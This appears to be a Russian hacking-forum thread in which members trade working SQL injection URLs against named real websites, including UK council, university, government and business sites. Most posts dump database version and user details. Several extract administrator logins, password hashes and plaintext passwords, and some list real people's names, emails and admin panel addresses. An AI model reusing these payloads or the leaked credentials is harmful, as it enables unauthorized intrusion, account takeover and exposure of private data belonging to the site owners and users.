SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://nvector.ru/novost.php?id=-70+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8

    5.0.75-percona-highperf-b11-log:[email protected]:a12807_nv
     
    1 person likes this.
  2. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    SQL

    http://www.rossendale.gov.uk/site/scripts/recruit_details.php?id=%20null+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10

    http://www.hyndburnbc.gov.uk/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+J

    http://www.wellingborough.gov.uk/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+J
     
  3. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://danibeba.com/novost.php?id=-29+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10/*

    5.0.26-log:stilinte@localhost:stilinte

    http://danibeba.com/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unhex(hex(password)),8,9,10+from+admin+limit+1,1/*

    stilinte
    *7BA1F2EDCF65942796215A171E26C3806F456350

    http://danibeba.com/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unhex(hex(password)),8,9,10+from+admin+limit+0,1/*

    jazz
    *120F748F8B68B55C556F18BBF7F0A413706703B3

    ----------
    http://www.parkingsabac.com/strane/novost.php?id=8+and+substring(version(),1,1)=3/*
     
  4. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    http://www.spos.info/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unh%20ex(hex(password)),8,9,10+from+admin+limit+0,1/*

    1
    Notice: Undefined offset: 1 in /home/sposinfo/public_html/novost.php on line 34

    Notice: Undefined variable: mesec in /home/sposinfo/public_html/novost.php on line 83

    Notice: Undefined offset: 2 in /home/sposinfo/public_html/novost.php on line 83
    postavljeno

    http://www.jadraninvest.hr/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unh%20ex(hex(password)),8,9,10+from+admin+limit+0,1/*

    http://www.ilindenscout.org.mk/novost.php?id=-29+union+select+1,2,3,unhex(hex(username)),5,6,unh%20ex(hex(password)),8,9,10+from+admin+limit+0,1/*
     
  5. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.ilindenscout.org.mk/novost.php?id=-4+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7

    ,8,9,10,11,12
    5.0.45-log:[email protected]:ilindenscout
    ----------
    http://www.fototeh.hr/novost.php?nid=31+and+substring(version(),1,1)=5
    ----------
    http://www.pk-primorje.hr/novost.php?id=55+union+select+1,version(),3,4,5,6
    5.0.67-community
    ----------
    http://www.roltek.at/novost.php?id=46+union+select+1,version(),3,4,5,6,7,8,9,10,11
    5.0.67-community
    ----------
    http://www.alea.hr/novost.php?id=5+union+select+1,version(),3,4,5,6
    4.1.22-standard
    ----------
    http://www.naj-novilist.com/novost.php?id=-147+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,

    8,9,10,11,12,13,14,15,16,17,18,19,20
    5.0.67-community:najnovi_najnovi@localhost:najnovi_snl
    ---------
    http://www.ipb-ild.ac.yu/novost.php?cid=1091+and+substring(version(),1,1)=3
    ----------
    http://www.tetrada.rs/novost.php?id=79+union+select+1,version(),3,4,5,6,7,8,9,10,11
    5.0.51a-log
    ----------
    http://galaxy.hr/novost.php?id=-1037+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10
    4.1.22-standard:galaxy_admin@localhost:galaxy_cms
     
    1 person likes this.
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://skylog.kz/content.php?id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),user(),database()),30,31,32,33+--+

    5.0.77:skylog_kz@localhost:base_skylog

    http://skylog.kz/content.php?id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,group_concat(concat_Ws(0x3a,password,login,email)),30,31,32,33+from+users+--+

    через лимит смареть всех
     
    _________________________
  7. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.oilgas.co.uk/pressrelease/index.php?id=-205'+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+/*+

    http://taochifashion.com/index.php?link=products&id=-2+union+select+1,2,concat_ws(0x3a3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin+/*+

    http://taochifashion.com/admin/
    admin::coron6a
     
    1 person likes this.
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://keystone.com.ua/print_real.php?id=-3414+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15--

    5.1.34

    http://keystone.com.ua/print_real.php?id=-3414+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+group+by+table_schema+limit+1,1--

    http://keystone.com.ua/print_real.php?id=-3414+union+select+1,2,3,group_concat(concat_Ws(0x3a,login,pass)),5,6,7,8,9,10,11,12,13,14,15+from+users--

    shoot79:e10adc3949ba59abbe56e057f20f883e 123456
     
    _________________________
  9. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.metalprim.si/novost.php?id=85+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11
    5.0.77:metalpri@localhost:metalpri
    ------
    http://www.gvko.edu.mk/novost.php?id=13+and+substring(version(),1,1)=5
    ------
    http://www.pk-primorje.hr/novost.php?id=91+and+substring(version(),1,1)=5
     
    1 person likes this.
  10. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Code:
    http://www.mixer.su/htm/new.php?id=-5+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7
    4.1.18:wwwstroymolru:[email protected]

    Code:
    http://www.znizka.com.ua/new.php?id=145+and+substring(@@version,1,1)=5
    Code:
    http://www.scrosscreations.com/new.php?id=-12+union+select+1,2,concat_ws(0x3a,version(),database(),user())
    5.0.67-log:scrosscreations:[email protected]

    Code:
    http://www.saifeitrading.com/new.php?id=-21+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8
    5.0.67-community-log:saifeitr_124:saifeitr_125@localhost

    Code:
    http://chinaproductsale.com/new.php?id=-20+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())
    5.0.67-community-log:chinpse_new:chinpse_new@localhost
     
  11. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    planetroxette@localhost
    5.0.51a
    planet_roxette

    Таблы
    b76c5196ee000be254e35c3cfc3c291b0634884d
    admin

    Админго


    marek@localhost
    5.0.21
    evillabs_evilbase


    Таблы (очень много)
     
    #9551 udman, 2 Jun 2009
    Last edited: 2 Jun 2009
    2 people like this.
  12. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.clei.cl/cleiej/paper.php?id=-89+union+select+1,2,concat_ws(0x3a,version(),user

    (),database()),4,5,6,7,8,9,10,11,12

    5.0.70-log:clei@localhost:clei
     
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.aquamonit.de/index.php?id=-1+union+select+1,2,3,version(),5,6,7,8--&lang=en

    5.0.51a-3ubuntu5.4

    http://www.aquamonit.de/index.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables+group+by+table_schema+limit+0,1001--&lang=en

    comments,gnet_highscore,projects,spam,downloads,gnet_serverlist,update,faq,news,users,gnet_banned,pages
     
    _________________________
  14. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.luxbt.ru/profi.php?rub=501+and+substring(version(),1,1)=5
    PR 3, ТИЦ 80
    ------------
    http://magazinru.ru/profi.php?rub=499&action=view&id=970+and+substring(version(),1,1)=4
    PR 2, ТИЦ 80
    -----------
    http://kubsau.ru/science/public.php?kanarev&kind=-14+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12
    5.0.24a-community-max-nt-log:[email protected]:1gb_kat

    таблички:
    http://kubsau.ru/science/public.php?kanarev&kind=-14+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables

    столбцы таблицы admin:
    http://kubsau.ru/science/public.php?kanarev&kind=-14+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x61646d696e

    http://kubsau.ru/science/public.php?kanarev&kind=-14+union+select+1,2,concat_ws(0x3a,id,fam,im,ot,level,log,pas),4,5,6,7,8,9,10,11,12+from+admin

    1:Попок:Леонид:Евгеньевич:0:a4c23c939d0cbc1673fc7c5c50b83756:805b48d7df5911c3f17f30173e8cdbe2
    2:Лагунов:Владимир:Михайлович:0:c67f0777b4f97d43cbdc5c6514329b6d:cf88dd49c405318c8bd7ab2cdec90d6b
    3:Назарова:Ольга:Владимировна:0:17a3d901d7fa532f219345816eada58e:89343f0f1812f8c5b4469ef7177934f7
    4:Осенний:Виталий::1:8e8c353d62ba73d67214e7b9d93cbd91:89f5c3bb44767ddb76c16a5932d1ab4f

    админка: http://kubsau.ru/admin/
    PR 5, ТИЦ 800
    -------------------

    Портал федеральных органов власти Сибирского федерального округа
    http://www.sfo.nsk.su/gnk/prof.php?action=art&nart=2586+and+substring(version(),1,1)=3
    ТИЦ 750
     
    #9554 AlexSatter, 2 Jun 2009
    Last edited: 2 Jun 2009
  15. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*

    Super User:root:89905f508ebdc32e7eb0c24fdb118305 pass : LsM8duCa
     
    1 person likes this.
  16. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    ttp://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4
    5.0.22:cinergiedbuser@localhost:cinergiedb

    таблицы:
    http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,table_name,3,4+from+information_schema.tables
    Интересующие нас таблицы: login и user

    поля login:
    http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,column_name,3,4+from+information_schema.columns+where+table_name=0x6c6f67696e

    http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,id,nom,login,password,email),3,4+from+login

    1:Dimitra:dimi:kenzo:[email protected]




    2:Samira:sami:alpacino:[email protected]




    3:Sarah:deela:ninou:[email protected]



    4:Doria:doria:admin:dhamelryk@tempo

    поля user:
    http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,column_name,3,4+from+information_schema.columns+where+table_name=0x75736572

    сами юзеры
    http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,id,login,pass,pseudo,email,privilege),3,4+from+user

    перечеслять здесь не буду :)
     
    1 person likes this.
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.thechimneypot.com/gallery.php?category_id=17&hall_of_fame=&project_id=-336+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6--
    thechim2_tcpcom@localhost:thechim2_chimneycom:5.0.77-community
     
  18. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<Lobzik>>
    Code:
    http://www.lobzik.pri.ee/modules/wfsection/article.php?articleid=-80+union+select+1,2,3,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--+
    5.0.41:*:lobzik:*:lobzik@localhost:*:trustix-linux-gnu
     
  19. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    http://www.madstorage.com/blog.php?id=-720+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

    Database Version: 4.1.22-log
    Database name: massiveattack
    User name: [email protected]
     
  20. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://iep.univ-lille2.fr/enseignants/prof.php?numens=-511+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11
    4.0.24_debian-10sarge2-log:web@localhost:professeurs

    http://www.klanien-male.net/annuaire/prof.php?id=-9+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11
    4.0.27-MaxLog:dbo149594951@21
     
    1 person likes this.
Thread Status:
Not open for further replies.